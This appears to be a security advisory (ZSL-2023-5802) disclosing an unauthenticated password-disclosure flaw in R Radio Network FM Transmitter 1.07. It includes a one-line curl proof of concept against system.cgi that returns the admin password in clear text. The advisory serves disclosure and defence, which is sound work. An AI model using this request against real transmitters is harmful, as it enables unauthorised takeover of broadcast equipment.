Headline
R Radio Network FM Transmitter 1.07 system.cgi Password Disclosure
R Radio Network FM Transmitter version 1.07 suffers from an improper access control that allows an unauthenticated actor to directly reference the system.cgi endpoint and disclose the clear-text password of the admin user allowing authentication bypass and FM station setup access.
R Radio Network FM Transmitter 1.07 system.cgi Password DisclosureVendor: R Radio NetworkProduct web page: http://www.pktc.ac.thAffected version: 1.07Summary: R Radio FM Transmitter that includes FM Exciter andFM Amplifier parameter setup.Desc: The transmitter suffers from an improper access controlthat allows an unauthenticated actor to directly reference thesystem.cgi endpoint and disclose the clear-text password of theadmin user allowing authentication bypass and FM station setupaccess.Tested on: CSBtechDeviceVulnerability discovered by Gjoko 'LiquidWorm' Krstic @zeroscienceAdvisory ID: ZSL-2023-5802Advisory URL: https://www.zeroscience.mk/en/vulnerabilities/ZSL-2023-5802.php09.10.2023--$ curl -s http://192.168.70.12/system.cgi<html><head><title>System Settings</title>......Password for user 'admin'</td><td><input type=password name=pw size=10 maxlength=10 value="testingus"></td>......$